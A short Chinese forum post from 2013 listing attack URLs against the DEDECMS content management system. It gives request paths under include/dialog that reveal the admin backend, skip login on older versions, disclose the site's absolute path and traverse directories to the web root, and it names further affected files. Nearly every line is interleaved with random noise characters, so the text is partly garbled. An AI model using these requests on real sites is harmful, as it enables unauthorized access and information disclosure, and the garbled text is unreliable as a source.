1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理' t1 e6 N) a ]& I( ] J! R; k
" E( F$ @ r" l) m
员帐号,新版本的就直接转向了后台.6 M+ V6 U* w7 ]* M; a6 I) N5 @
# q1 w9 x5 N" T. M% R3 s
2.include/dialog/config.php会爆出后台管理路径
, v7 y _+ d$ G U8 P4 j" L
) i1 y1 s6 S5 a- J \& Q% T1 x) d( |: q3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录# d6 W- ^$ A. ?/ {
1 G2 M, p8 w% l& C2 ~5 {4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
) I' S" s$ G9 F- J. U* V. j( ~! k5 J$ y- Q* n m
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉6 s% w" ^3 @3 D3 F3 n$ c
; E! r( R7 R8 a+ C- r
到根目录去.不过这些版本的访问地址有些不同.( j' U& C# v# T5 B! g6 A
地址为require/dialog/select_soft.php?activepath=/././././././././
9 S$ w" G+ q3 V, a5 T4 z1 b* i/ K2 {. P
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..) t3 w) w- }) _# O( \$ [
存在相同问题的文件还有
* j$ b- Y- h+ t: V9 i r/ V% L+ @include\dialog\select_images.php
) V G8 W9 @8 w* j1 Rinclude\dialog\select_media.php, a+ h0 M5 m2 J, _6 X) E
include\dialog\select_templets.php
9 p/ I( E- S% b/ Z7 l6 P5 i |
发表于 2013-4-16 16:50:43
收藏
支持
反对